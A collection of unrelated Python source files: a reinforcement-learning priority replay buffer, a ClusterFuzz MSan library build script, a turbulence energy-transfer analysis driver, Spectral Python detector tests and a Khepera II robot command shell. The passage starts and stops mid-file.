self._it_min[idx] = priority ** self._alpha
self._max_priority = max(self._max_priority, priority)
"""
Priority Tree.
3 tiered tree structure containing
Root node (Object. sum of all lower values)
Intermediate Node (Object. Root as parent, sums a given slice of the priority array)
Priority Array (Array of priorities, length buffer_size)
The number of Intermediate nodes is calculated by the buffer_size / batch_size.
I_episode: current episode of training
Index: is calculated by i_episode % buffer_size. This loops the index after exceeding the buffer_size.
Indicies: (List) of memory/priority entries
intermediate_dict: maps index to intermediate node. Since each Intermediate node is responsible
for a given slice of the priority array, given a particular index, it will return the Intermediate node
'responsible' for that index.
## Functions:
Add:
Calculates the priority of each TD error -> (abs(TD_error)+epsilon)**alpha
Stores the priority in the Priority_array.
Updates the sum_tree with the new priority
Update_Priorities:
Updates the index with the latest priority of that sample. As priorities can change over training
for a particular experience
Sample:
Splits the current priority_array based on the number of entries, by the batch_size.
Returns the indicies of those samples and the priorities.
Propogate:
Propogates the new priority value up through the tree
"""
class PriorityTree(object):
def __init__(self,buffer_size,batch_size,alpha,epsilon):
self.alpha = alpha
self.epsilon = epsilon
self.buffer_size = buffer_size
self.batch_size = batch_size
self.num_intermediate_nodes = math.ceil(buffer_size / batch_size)
self.current_intermediate_node = 0
self.root = Node(None)
self.intermediate_nodes = [Intermediate(self.root,batch_size*x,batch_size*(x+1)) for x in range(self.num_intermediate_nodes)]
self.priority_array = np.zeros(buffer_size)
self.intermediate_dict = {}
for index,node in enumerate(self.intermediate_nodes):
for key in range((batch_size*(index+1))-batch_size,batch_size*(index+1)):
self.intermediate_dict[key] = node
print('Priority Tree: Batch Size {} Buffer size {} Number of intermediate Nodes {}'.format(batch_size,buffer_size,self.num_intermediate_nodes))
def add(self,TD_error,index):
priority = (abs(TD_error)+self.epsilon)**self.alpha
self.priority_array[index] = priority
# Update sum
propogate(self.intermediate_dict[index],self.priority_array)
def sample(self,index):
# Sample one experience uniformly from each slice of the priorities
if index >= self.buffer_size:
indicies = [random.sample(list(range(sample*self.num_intermediate_nodes,(sample+1)*self.num_intermediate_nodes)),1)[0] for sample in range(self.batch_size)]
else:
interval = int(index / self.batch_size)
indicies = [random.sample(list(range(sample*interval,(sample+1)*interval)),1)[0] for sample in range(self.batch_size)]
# print('indicies',indicies)
priorities = self.priority_array[indicies]
return priorities,indicies
def update_priorities(self,TD_errors,indicies):
# print('TD_errors',TD_errors)
# print('TD_errors shape',TD_errors.shape)
priorities = (abs(TD_errors)+self.epsilon)**self.alpha
# print('priorities shape',priorities.shape)
# print('indicies shape',len(indicies))
# print('self.priority_array shape',self.priority_array.shape)
self.priority_array[indicies] = priorities
# Update sum
nodes = [self.intermediate_dict[index] for index in indicies]
intermediate_nodes = set(nodes)
[propogate(node,self.priority_array) for node in intermediate_nodes]
class Node(object):
def __init__(self,parent):
self.parent = parent
self.children = []
self.value = 0
def add_child(self,child):
self.children.append(child)
def set_value(self,value):
self.value = value
def sum_children(self):
return sum([child.value for child in self.children])
def __len__(self):
return len(self.children)
class Intermediate(Node):
def __init__(self,parent,start,end):
self.parent = parent
self.start = start
self.end = end
self.value = 0
parent.add_child(self)
def sum_leafs(self,arr):
return np.sum(arr[self.start:self.end])
def propogate(node,arr):
if node.parent != None:
node.value = node.sum_leafs(arr)
propogate(node.parent,arr)
else:
node.value = node.sum_children()
"""
Priority Buffer HyperParameters
alpha(priority or w) dictates how biased the sampling should be towards the TD error. 0 < a < 1
beta(IS) informs the importance of the sample update
The paper uses a sum tree to calculate the priority sum in O(log n) time. As such, i've implemented my own version
of the sum_tree which i call priority tree.
We're increasing beta(IS) from 0.5 to 1 over time
alpha(priority) we're holding constant at 0.5
"""
class PriorityReplayBuffer(object):
def __init__(self,action_size,buffer_size,batch_size,seed,alpha=0.5,beta=0.5,beta_end=1,beta_duration=1e+5,epsilon=7e-5):
self.seed = random.seed(seed)
self.action_size = action_size
self.buffer_size = buffer_size
self.batch_size = batch_size
self.alpha = alpha
self.beta = beta
self.beta_end = beta_end
self.beta_duration = beta_duration
self.beta_increment = (beta_end - beta) / beta_duration
self.max_w = 0
self.epsilon = epsilon
self.TD_sum = 0
self.device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
self.experience = namedtuple('experience',field_names=['state','action','reward','next_state','done','i_episode'])
self.sum_tree = PriorityTree(buffer_size,batch_size,alpha,epsilon)
self.memory = {}
def add(self,state,action,reward,next_state,done,TD_error,i_episode):
e = self.experience(state,action,reward,next_state,done,i_episode)
index = i_episode % self.buffer_size
# add memory to memory and add corresponding priority to the priority tree
self.memory[index] = e
self.sum_tree.add(TD_error,index)
def sample(self,index):
# We times the error by these weights for the updates
# Super inefficient to sum everytime. We could implement the tree sum structure.
# Or we could sum once on the first sample and then keep track of what we add and lose from the buffer.
# priority^a over the sum of the priorities^a = likelyhood of the given choice
# Anneal beta
self.update_beta()
# Get the samples and indicies
priorities,indicies = self.sum_tree.sample(index)
# Normalize with the sum
norm_priorities = priorities / self.sum_tree.root.value
samples = [self.memory[index] for index in indicies]
# samples = list(operator.itemgetter(*self.memory)(indicies))
# samples = self.memory[indicies]
# Importance weights
# print('self.beta',self.beta)
# print('self.beta',self.buffer_size)
importances = [(priority * self.buffer_size)**-self.beta for priority in norm_priorities]
self.max_w = max(self.max_w,max(importances))
# Normalize importance weights
# print('importances',importances)
# print('self.max_w',self.max_w)
norm_importances = [importance / self.max_w for importance in importances]
# print('norm_importances',norm_importances)
states = torch.from_numpy(np.vstack([e.state for e in samples if e is not None])).float().to(self.device)
actions = torch.from_numpy(np.vstack([e.action for e in samples if e is not None])).long().to(self.device)
rewards = torch.from_numpy(np.vstack([e.reward for e in samples if e is not None])).float().to(self.device)
next_states = torch.from_numpy(np.vstack([e.next_state for e in samples if e is not None])).float().to(self.device)
# np.vstack([e.done for e in samples if e is not None]).astype(int)
dones = torch.from_numpy(np.vstack([e.done for e in samples if e is not None]).astype(int)).float().to(self.device)
# dones = torch.from_numpy(np.vstack([e.done for e in samples if e is not None])).float().to(self.device)
if index % 4900 == 0:
print('beta',self.beta)
print('self.max_w',self.max_w)
print('len mem',len(self.memory))
print('tree sum',self.sum_tree.root.value)
return (states,actions,rewards,next_states,dones),indicies,norm_importances
def update_beta(self):
# print('update_beta')
# print('self.beta_end',self.beta_end)
# print('self.beta_increment',self.beta_increment)
self.beta += self.beta_increment
self.beta = min(self.beta,self.beta_end)
def __len__(self):
return len(self.memory.keys()) |
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Build MSan instrumented libs on Google Container Builder."""
# Usage:
# 1. build_msan_libs.py [--no-track-origins] build_packages
# 2. Wait for builds to complete on
# https://console.cloud.google.com/gcr/builds?project=google.com:clusterfuzz
# 3. Once all builds have succeeded, run:
# build_msan_libs.py [--no-track-origins] merge
import argparse
import datetime
from googleapiclient.discovery import build
UPLOAD_BUCKET = 'clusterfuzz-chromium-msan-libs'
DISTRO_VERSION = '16.04'
BUILD_TIMEOUT = 2 * 60 * 60
# For Chromium on Ubuntu 16.04
PACKAGES = [
'libappindicator3-1',
'libasound2',
'libatk1.0-0',
'libatk-bridge2.0-0',
'libatspi2.0-0',
'libavahi-client3',
'libavahi-common3',
'libcairo2',
'libcairo-gobject2',
'libcap2',
'libcomerr2',
'libcroco3',
'libcups2',
'libdatrie1',
'libdbus-1-3',
'libdbusmenu-glib4',
'libdbusmenu-gtk3-4',
'libepoxy0',
'libexpat1',
'libffi6',
'libfontconfig1',
'libfreetype6',
'libgcrypt20',
'libgdk-pixbuf2.0-0',
'libglib2.0-0',
'libgmp10',
'libgnutls30',
'libgpg-error0',
'libgraphite2-3',
'libgssapi-krb5-2',
'libgtk-3-0',
'libharfbuzz0b',
'libhogweed4',
'libidn11',
'libido3-0.1-0',
'libindicator3-7',
'libk5crypto3',
'libkeyutils1',
'libkrb5-3',
'libkrb5support0',
'liblz4-1',
'liblzma5',
'libnettle6',
'libnspr4',
'libnss3',
'libp11-kit0',
'libpango-1.0-0',
'libpangocairo-1.0-0',
'libpangoft2-1.0-0',
'libpci3',
'libpcre3',
'libpixman-1-0',
'libpng12-0',
'libpulse0',
'librsvg2-2',
'libselinux1',
'libsqlite3-0',
'libsystemd0',
'libtasn1-6',
'libthai0',
'libudev1',
'libwayland-client0',
'libwayland-cursor0',
'libx11-6',
'libx11-xcb1',
'libxau6',
'libxcb1',
'libxcb-render0',
'libxcb-shm0',
'libxcomposite1',
'libxcursor1',
'libxdamage1',
'libxdmcp6',
'libxext6',
'libxfixes3',
'libxi6',
'libxinerama1',
'libxkbcommon0',
'libxml2',
'libxrandr2',
'libxrender1',
'libxss1',
'libxtst6',
'zlib1g',
]
def bucket_path(no_track_origins):
"""Return the bucket path to upload to."""
if no_track_origins:
subdir = 'no-origins'
else:
subdir = 'chained-origins'
return 'gs://%s/%s/%s' % (UPLOAD_BUCKET, DISTRO_VERSION, subdir)
def build_steps(package_name, no_track_origins=False):
"""Return build steps for a package."""
zip_name = package_name + '.zip'
build_args = ['msan_build.py', '--no-build-deps', package_name, '/workspace']
if no_track_origins:
build_args.append('--no-track-origins')
return [
{
# Build package.
'args': build_args,
# Use OSS-Fuzz's MSan builder.
'name': 'gcr.io/oss-fuzz-base/base-msan-builder',
},
{
# Zip results.
'args': ['zip', '-r', '-y', zip_name, '.'],
'name': 'gcr.io/oss-fuzz-base/base-msan-builder',
},
{
# Upload.
'args': [
'cp',
zip_name,
'%s/packages/%s' % (bucket_path(no_track_origins), zip_name),
],
'name':
'gcr.io/cloud-builders/gsutil',
},
]
def get_build(steps):
"""Get a build given steps."""
return {
'steps': steps,
'timeout': str(BUILD_TIMEOUT) + 's',
'options': {
'machineType': 'N1_HIGHCPU_8',
},
}
def merge_steps(no_track_origins=False):
"""Get merge steps to merge individual packages into a single zip."""
timestamp = datetime.datetime.utcnow().strftime('%Y%m%d%H%M')
filename = 'latest-%s.zip' % timestamp
return [
{
# Download all individual packages.
'args': [
'-m', 'cp', '-r',
bucket_path(no_track_origins) + '/packages/', '.'
],
'name':
'gcr.io/cloud-builders/gsutil',
},
{
# Extract.
'args': [
'bash',
'-c',
'mkdir all && cd all && unzip -o "../packages/*.zip"',
],
'name':
'gcr.io/oss-fuzz-base/base-msan-builder',
},
{
# Zip.
'args': [
'bash', '-c',
'find -L -name \'*.so*\' | zip -y %s -@' % filename
],
'dir':
'all',
'name':
'gcr.io/oss-fuzz-base/base-msan-builder',
},
{
# Upload.
'args': [
'cp',
filename,
bucket_path(no_track_origins) + '/' + filename,
],
'dir':
'all',
'name':
'gcr.io/cloud-builders/gsutil',
},
]
def start_build(cloudbuild, build_body):
"""Start a build."""
build_info = cloudbuild.projects().builds().create(
projectId='google.com:clusterfuzz', body=build_body).execute()
return build_info['metadata']['build']['id']
def main():
parser = argparse.ArgumentParser(
'build_msan_libs.py', description='MSan builder.')
parser.add_argument(
'--no-track-origins',
action='store_true',
help='Build with -fsanitize-memory-track-origins=0.')
parser.add_argument(
'command',
choices=['build_packages', 'merge'],
help='The command to run.')
args = parser.parse_args()
cloudbuild = build('cloudbuild', 'v1', cache_discovery=False)
if args.command == 'build_packages':
for package in PACKAGES:
build_body = get_build(build_steps(package, args.no_track_origins))
print(start_build(cloudbuild, build_body))
else: # merge
print(
start_build(cloudbuild, get_build(merge_steps(args.no_track_origins))))
if __name__ == '__main__':
main()
|
<reponame>Carlson-J/energy-transfer-analysis
import argparse
from mpi4py import MPI
import FFTHelperFuncs
from IOhelperFuncs import read_fields
from EnergyTransfer import EnergyTransfer
from FlowAnalysis import FlowAnalysis
import os
import sys
import pickle
import numpy as np
analysis_description = (
"MPI parallel turbulence simulation analysis"
)
analysis_epilog = (
"Full documentation of options available at "
"https://github.com/pgrete/energy-transfer-analysis"
)
parser = argparse.ArgumentParser(description=analysis_description, epilog=analysis_epilog)
parser.add_argument('--res',
required=True,
type=int,
help='set linear resolution of cubic box')
parser.add_argument('--type',
required=True,
type=str,
choices=['transfer','flow','unit-test'],
help='set analysis type')
parser.add_argument('--data_type',
required=True,
type=str,
choices=['Enzo', 'AthenaPP', 'AthenaPPHDF', 'AthenaHDFC', 'Athena'],
help='set data cube type')
parser.add_argument('--data_path',
required=True,
type=str,
help='set data location')
parser.add_argument('--outfile',
type=str,
default=None,
help='set file to store results')
parser.add_argument('--extrema_file',
type=str,
help='Pickled Python dict containing extrema for flow analysis')
parser.add_argument('-b',
action='store_true',
default=False,
help='enable magnetic fields')
parser.add_argument('-forced',
action='store_true',
default=False,
help='output is actively forced')
parser.add_argument('--eos',
required=True,
type=str,
choices=['isothermal','adiabatic'],
help='set equation of state')
parser.add_argument('--gamma',
type=float,
default=None,
help='set adiabatic gamma index')
parser.add_argument('-approx-isothermal',
action='store_true',
default=False,
help='assume c_s^2 / gamma = p/rho = 1')
parser.add_argument('--terms',
type=str,
nargs='+',
default=None,
choices = ['All', 'Int', 'UU', 'BUT', 'BUP', 'UBT', 'UBPb',
'BB', 'BUPbb', 'UBPbb', 'SS', 'SU', 'US', 'PU', 'FU'],
help='set energy transfer terms to analyze')
parser.add_argument('--binning',
default=None,
type=str,
choices=['log', 'lin', 'test'],
help='set binning used in energy transfer analysis')
parser.add_argument('--kernels',
default=None,
type=str,
nargs='+',
choices=['Box', 'Sharp', 'Gauss'],
help='choose convolution kernel type(s): Box, Sharp, or Gauss')
args = vars(parser.parse_args())
# Check equation of state parameters
if args['eos'] == 'adiabatic' and args['gamma'] == None:
raise SystemExit('Please set gamma for when using adiabatic EOS')
# Check energy transfer arguments
if args['type'] != 'transfer' and args['terms'] != None:
raise SystemExit('--terms to analyze set but --type is not transfer')
if args['type'] == 'transfer' and args['terms'] == None:
raise SystemExit('Asking for energy transfer analysis but no terms chosen')
if args['type'] == 'transfer' and args['binning'] == None:
raise SystemExit('Asking for energy transfer analysis but no binnig chosen')
# Set mpi vars
comm = MPI.COMM_WORLD
rank = comm.Get_rank()
size = comm.Get_size()
# Parse energy transfer arguments
resolution = args['res']
if args['type'] == 'transfer':
magnetic_terms = ['BB', 'BUT', 'BUP', 'UBT', 'UBPb']
terms_to_analyze = args['terms']
if 'All' in terms_to_analyze:
terms_to_analyze += ['UU']
if args['b']:
terms_to_analyze += magnetic_terms
while 'All' in terms_to_analyze:
terms_to_analyze.remove('All')
if 'Int' in terms_to_analyze:
terms_to_analyze += ['SS', 'US', 'SU']
while 'Int' in terms_to_analyze:
terms_to_analyze.remove('Int')
terms_to_analyze = list(set(terms_to_analyze))
for this_term in magnetic_terms:
if this_term in terms_to_analyze and not args['b']:
raise SystemExit(
'Asking for magnetic energy transfer analysis but ' +
'data is identified as not containing magnetic fields.\n' +
'Try adding the -b if the simulation contains magnetic fields.'
)
if 'FU' in terms_to_analyze and not args['forced']:
raise SystemExit(
'Asking for acceleration field energy transfer analysis but ' +
'data is identified as not containing acceleration fields.\n' +
'Try adding the -forced if the simulation contains acceleration fields.'
)
if args['binning'] == 'lin':
bins = np.concatenate((np.linspace(0.5,resolution/2-0.5,resolution/2,
endpoint=True),
[float(resolution)/2.*np.sqrt(3)]))
elif args['binning'] == "log":
resolution_exp = np.log(resolution/8)/np.log(2) * 4 + 1
bins = np.concatenate(
(np.array([0.]), 4.* 2** ((np.arange(0,resolution_exp + 1) - 1.) /4.)))
elif args['binning'] == "test":
bins = [0.5,1.5,2.5,16.0,26.5,28.5,32.0]
else:
raise SystemExit('Binning undetermined')
if args['outfile'] is None and args['type'] != 'unit-test':
raise SystemExit('Outfile required for analysis.')
outfile = args['outfile']
if args['eos'] == 'adiabatic':
gamma = args['gamma']
else:
gamma = None
# Setup FFTs. Using real->complex transforms for performance in the transfer
# analysis and because all quantities are also transformed back.
# Using complex->complex transforms for the flow analysis so that the total
# power in real and spectral space is identical without normalizing for
# power in the complex conjugate modes.
if args['type'] == 'transfer':
FFTHelperFuncs.setup_fft(args['res'], dtype=np.float64)
else:
FFTHelperFuncs.setup_fft(args['res'], dtype=np.complex128)
# Load data to data dictionary
fields = read_fields(args)
# Run energy transfer analysis
if args['type'] == 'transfer':
ET = EnergyTransfer(MPI,resolution,fields,gamma)
if rank == 0:
if os.path.isfile(outfile):
print("Reading previous transfer file")
if sys.version_info[0] < 3:
results = pickle.load(open(outfile,"rb"))
else:
results = pickle.load(open(outfile,"rb"),encoding='latin1')
else:
results = {}
else:
results = None
# threoretically k and q binnig could be independent
k_bins = bins
q_bins = bins
ET.getTransferWWAnyToAny(results, k_bins, q_bins, terms_to_analyze)
if rank == 0:
pickle.dump(results,open(outfile,"wb"))
elif args['type'] == 'flow':
FA = FlowAnalysis(MPI,args,fields)
FA.run_analysis()
elif args['type'] == 'unit-test':
FA = FlowAnalysis(MPI,args,fields)
FA.run_test()
else:
raise SystemExit('Unknown transfer type: ', args['type'])
|
<reponame>satish1901/Methane-detection-from-hyperspectral-imagery
#########################################################################
#
# detectors.py - This file is part of the Spectral Python (SPy) package.
#
# Copyright (C) 2013 <NAME>
#
# Spectral Python is free software; you can redistribute it and/
# or modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# Spectral Python is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this software; if not, write to
#
# Free Software Foundation, Inc.
# 59 Temple Place, Suite 330
# Boston, MA 02111-1307
# USA
#
#########################################################################
#
# Send comments to:
# <NAME>, <EMAIL>
#
'''Runs unit tests for various target detectors
To run the unit tests, type the following from the system command line:
# python -m spectral.tests.detectors
'''
from __future__ import division, print_function, unicode_literals
import numpy as np
from numpy.testing import assert_allclose
from .spytest import SpyTest
import spectral as spy
class MatchedFilterTest(SpyTest):
def setup(self):
from spectral.algorithms.detectors import MatchedFilter
self.data = spy.open_image('92AV3C.lan').load()
self.background = spy.calc_stats(self.data)
self.target_ij = [33, 87]
# self.target = self.data[33, 87]
(i, j) = self.target_ij
self.mf = MatchedFilter(self.background, self.data[i, j])
def test_mf_bg_eq_zero(self):
'''Matched Filter response of background should be zero.'''
(i, j) = self.target_ij
np.testing.assert_approx_equal(self.mf(self.background.mean), 0)
def test_mf_target_eq_one(self):
'''Matched Filter response of target should be one.'''
from spectral.algorithms.detectors import matched_filter
(i, j) = self.target_ij
target = self.data[i, j]
mf = matched_filter(self.data, target, self.background)
np.testing.assert_approx_equal(mf[i, j], 1)
def test_mf_target_no_bg_eq_one(self):
'''Matched Filter response of target should be one.'''
from spectral.algorithms.detectors import matched_filter
(i, j) = self.target_ij
target = self.data[i, j]
mf = matched_filter(self.data, target)
np.testing.assert_approx_equal(mf[i, j], 1)
def test_mf_target_pixel_eq_one(self):
'''Matched Filter response of target pixel should be one.'''
(i, j) = self.target_ij
np.testing.assert_approx_equal(self.mf(self.data)[i, j], 1)
def test_mf_windowed_target_eq_one(self):
'''Windowed Matched Filter response of target pixel should be one.'''
X = self.data[:10, :10, :]
ij = (3, 3)
y = spy.matched_filter(X, X[ij], window=(3,7), cov=self.background.cov)
np.allclose(1, y[ij])
class RXTest(SpyTest):
def setup(self):
self.data = spy.open_image('92AV3C.lan').load()
self.background = spy.calc_stats(self.data)
def test_rx_bg_eq_zero(self):
from spectral.algorithms.detectors import rx, RX
d = rx(self.data)
stats = spy.calc_stats(self.data)
np.testing.assert_approx_equal(rx(stats.mean, background=stats), 0)
class ACETest(SpyTest):
def setup(self):
self.data = spy.open_image('92AV3C.lan').load()
self.bg = spy.calc_stats(self.data)
self.X = self.data[:20, :20, :]
def test_ace_bg_eq_zero(self):
'''ACE score of background mean should be zero.'''
ij = (10, 10)
y = spy.ace(self.bg.mean, self.X[ij], background=self.bg)
assert(np.allclose(0, y))
def test_ace_pixel_target_eq_one(self):
'''ACE score of target should be one for single pixel arg.'''
ij = (10, 10)
y = spy.ace(self.X[ij], self.X[ij], background=self.bg)
assert(np.allclose(1, y))
def test_ace_novec_pixel_target_eq_one(self):
'''ACE score of target should be one for single pixel arg.'''
ij = (10, 10)
y = spy.ace(self.X[ij], self.X[ij], background=self.bg, vectorize=False)
assert(np.allclose(1, y))
def test_ace_target_eq_one(self):
'''ACE score of target should be one.'''
ij = (10, 10)
y = spy.ace(self.X, self.X[ij], background=self.bg)
assert(np.allclose(1, y[ij]))
def test_ace_novec_target_eq_one(self):
'''ACE score (without vectorization) of target should be one.'''
ij = (10, 10)
y = spy.ace(self.X, self.X[ij], background=self.bg, vectorize=False)
assert(np.allclose(1, y[ij]))
def test_ace_multi_targets_eq_one(self):
'''ACE score of multiple targets should each be one.'''
ij1 = (10, 10)
ij2 = (3, 12)
y = spy.ace(self.X, [self.X[ij1], self.X[ij2]], background=self.bg)
assert(np.allclose(1, [y[ij1][0], y[ij2][1]]))
def test_ace_novec_multi_targets_eq_one(self):
'''ACE score of multiple targets should each be one.'''
ij1 = (10, 10)
ij2 = (3, 12)
y = spy.ace(self.X, [self.X[ij1], self.X[ij2]], background=self.bg,
vectorize=False)
assert(np.allclose(1, [y[ij1][0], y[ij2][1]]))
def test_ace_multi_targets_bg_eq_zero(self):
'''ACE score of background for multiple targets should be one.'''
ij1 = (10, 10)
ij2 = (3, 12)
y = spy.ace(self.bg.mean, [self.X[ij1], self.X[ij2]],
background=self.bg)
assert(np.allclose(0, y))
def test_ace_subspace_targets_eq_one(self):
'''ACE score of targets defining target subspace should each be one.'''
ij1 = (10, 10)
ij2 = (3, 12)
y = spy.ace(self.X, np.array([self.X[ij1], self.X[ij2]]),
background=self.bg)
assert(np.allclose(1, [y[ij1], y[ij2]]))
def test_ace_novec_subspace_targets_eq_one(self):
'''ACE score of targets defining target subspace should each be one.'''
ij1 = (10, 10)
ij2 = (3, 12)
y = spy.ace(self.X, np.array([self.X[ij1], self.X[ij2]]),
background=self.bg, vectorize=False)
assert(np.allclose(1, [y[ij1], y[ij2]]))
def test_ace_subspace_bg_eq_zero(self):
'''ACE score of background for target subspace should be zero.'''
ij1 = (10, 10)
ij2 = (3, 12)
y = spy.ace(self.bg.mean, np.array([self.X[ij1], self.X[ij2]]),
background=self.bg)
assert(np.allclose(0, y))
def test_ace_windowed_target_eq_one(self):
'''ACE score of target for windowed background should be one.'''
ij = (10, 10)
y = spy.ace(self.X, self.X[ij], window=(3,7), cov=self.bg.cov)
assert(np.allclose(1, y[ij]))
def run():
print('\n' + '-' * 72)
print('Running target detector tests.')
print('-' * 72)
for T in [MatchedFilterTest, RXTest, ACETest]:
T().run()
if __name__ == '__main__':
from spectral.tests.run import parse_args, reset_stats, print_summary
parse_args()
reset_stats()
run()
print_summary()
|
#! /usr/bin/env python
################################################################################
#
# KheBaseShell.py
#
""" Khepera II Base Command-Line Shell Module
Khepera II base serial command-line shell provides a command-line
interface to most of the commands available on the Khepera II
base robot.
This shell is GuiTerm auto-capable.
Author: <NAME>
Email: <EMAIL>
URL: http://www.roadnarrowsrobotics.com
Date: 2005.12.24
Copyright (C) 2005, 2006. RoadNarrows LLC.
"""
#
# All Rights Reserved
#
# Permission is hereby granted, without written agreement and without
# license or royalty fees, to use, copy, modify, and distribute this
# software and its documentation for any purpose, provided that
# (1) The above copyright notice and the following two paragraphs
# appear in all copies of the source code and (2) redistributions
# including binaries reproduces these notices in the supporting
# documentation. Substantial modifications to this software may be
# copyrighted by their authors and need not follow the licensing terms
# described here, provided that the new terms are clearly indicated in
# all files where they apply.
#
# IN NO EVENT SHALL THE AUTHOR, ROADNARROWS LLC, OR ANY MEMBERS/EMPLOYEES
# OF ROADNARROW LLC OR DISTRIBUTORS OF THIS SOFTWARE BE LIABLE TO ANY
# PARTY FOR DIRECT, INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL
# DAMAGES ARISING OUT OF THE USE OF THIS SOFTWARE AND ITS DOCUMENTATION,
# EVEN IF THE AUTHORS OR ANY OF THE ABOVE PARTIES HAVE BEEN ADVISED OF
# THE POSSIBILITY OF SUCH DAMAGE.
#
# THE AUTHOR AND ROADNARROWS LLC SPECIFICALLY DISCLAIM ANY WARRANTIES,
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
# FITNESS FOR A PARTICULAR PURPOSE. THE SOFTWARE PROVIDED HEREUNDER IS ON AN
# "AS IS" BASIS, AND THE AUTHORS AND DISTRIBUTORS HAVE NO OBLIGATION TO
# PROVIDE MAINTENANCE, SUPPORT, UPDATES, ENHANCEMENTS, OR MODIFICATIONS.
#
################################################################################
try:
import readline # optional module
except ImportError:
pass
import Fusion.Gui.GuiTypes as gt
import Fusion.Gui.GuiWinShell as gterm
import Fusion.Khepera.Cmd.KheCmdBase as KheCmdBase
import Fusion.Utils.Shell as Shell
import Fusion.Khepera.Shells.KheRawShell as KheRawShell
#-------------------------------------------------------------------------------
# Global Data
#-------------------------------------------------------------------------------
# command arguments
ReArgIncRaw = Shell.ReX('incraw')
#-------------------------------------------------------------------------------
# CLASS: KheBaseShell
#-------------------------------------------------------------------------------
class KheBaseShell(KheRawShell.KheRawShell):
""" Khepera Base Shell Class. """
#--
def __init__(self, args=(), **kwargs):
""" Initialze Raw Shell.
Parameters:
args - arguments (not used)
kwargs - dictionary of shell options arguments
robotCmds - Robot commands object. Default: KheCmdBase()
**shopts - Shell raw and core options.
"""
# initialize shell base object
KheRawShell.KheRawShell.__init__(self, args, **kwargs)
#--
def Config(self, **kwargs):
""" Configure Options Override.
Parameters:
kwargs - dictionary of options arguments
"""
# this shell arguments defaults
dfts = {
'argv0': __file__,
'shName': 'Khepera Base',
'shVersion': '1.1',
'shPS1': 'khebase$ ',
'shPS2': 'khebase> ',
'robotCmds': None
}
# set shell argument defaults, but caller has precedence
for key, value in dfts.items():
if key not in kwargs or not kwargs[key]:
if key == 'robotCmds':
kwargs[key] = KheCmdBase.KheCmdBase()
else:
kwargs[key] = value
# set all options from arguments
KheRawShell.KheRawShell.Config(self, **kwargs)
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# The Command Dictionary (See Shell.py)
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
#--
def InitCmdDict(self):
""" Initialize Command Dictionary Override.
Return Value:
None
"""
# set shell base object's commands
KheRawShell.KheRawShell.InitCmdDict(self)
# this shell's additional or override commands
cmds = {
# version command
'version': {
'help': {
'desc': "Get Khepera OS version.",
'usage': "version",
'rvals': "OS version 2-tuple (<verBios>, <verProtocol>)."
},
'parse': [
{ 'refmt': Shell.ReStart + Shell.ReEnd,
'cvt': []
}
],
'prereq': [self.PreReqOpen],
'exec': self.CmdGetVersion
},
# setspeed command
'setspeed': {
'help': {
'desc': "Set Khepera's speed.",
'usage': "setspeed <motorLeft> <motorRight>",
'args': {
'<motorLeft>': "Left motor speed in mm/s [-1000.0, 1000.0]",
'<motorRight>': "Right motor speed in mm/s [-1000.0, 1000.0]"
},
'rvals': "New speed 2-tuple (<motorLeft>, <motorRight>)."
},
'parse': [
{ 'refmt': Shell.ReStart + Shell.ReArgFloat + Shell.ReArgFloat +
Shell.ReEnd,
'cvt': [self.CvtFloat]
}
],
'prereq': [self.PreReqOpen],
'exec': self.CmdSetSpeed
},
# stop command
'stop': {
'help': {
'desc': "Stop Khepera's motion.",
'usage': "stop",
'rvals': "Stopped speed 2-tuple (0, 0)."
},
'parse': [
{ 'refmt': Shell.ReStart + Shell.ReEnd,
'cvt': []
}
],
'prereq': [self.PreReqOpen],
'exec': self.CmdStop
},
# forward command
'forward': {
'help': {
'desc': "Move Khepera forward at the specified speed.",
'usage': "forward <motor>",
'args': {
'<motor>': "Left and right motor speeds in mm/s [0.0, 1000.0].",
},
'rvals': "New speed 2-tuple (<motor>, <motor>)."
},
'parse': [
{ 'refmt': Shell.ReStart + Shell.ReArgFloat + Shell.ReEnd,
'cvt': [self.CvtFloat]
}
],
'prereq': [self.PreReqOpen],
'exec': self.CmdForward
},
# backward command
'backward': {
'help': {
'desc': "Move Khepera backward at the specified speed.",
'usage': "backward <motor>",
'args': {
'<motor>': "Left and right motor speeds [0.0, 1000.0].",
},
'rvals': "New speed 2-tuple (-<motor>, -<motor>)."
},
'parse': [
{ 'refmt': Shell.ReStart + Shell.ReArgFloat + Shell.ReEnd,
'cvt': [self.CvtFloat]
}
],
'prereq': [self.PreReqOpen],
'exec': self.CmdBackward
},
# speed command
'speed': {
'help': {
'desc': "Get Khepera's current speed.",
'usage': "speed [incraw]",
'args': {
'incraw': "Include raw speed data."
},
'rvals': ["Current speed 2-tuple in mm/s "
"(<motorLeft>, <motorRight>).",
"If 'incraw' is specified, then include raw speed data:",
" (<motorLeft>, <motorRight>, <rawLeft>, <rawRight>)."]
},
'parse': [
{ 'refmt': Shell.ReStart + ReArgIncRaw + Shell.ReEnd,
'cvt': [self.CvtTrue]
},
{ 'refmt': Shell.ReStart + Shell.ReEnd,
'cvt': []
}
],
'prereq': [self.PreReqOpen],
'exec': self.CmdGetSpeed
},
# moveto command
'moveto': {
'help': {
'desc': "Move Khepera to the given odometer positions.",
'usage': "moveto <posLeft> <posRight>",
'args': {
'<posLeft>': "Target left motor position in mm [0.0, 671088.0]",
'<posRight>': "Target right motor position in mm [0.0, 671088.0]"
},
'rvals': "Target odometer positions (<posLeft>, <posRight>)."
},
'parse': [
{ 'refmt': Shell.ReStart + Shell.ReArgFloat + Shell.ReArgFloat +
Shell.ReEnd,
'cvt': [self.CvtFloat]
}
],
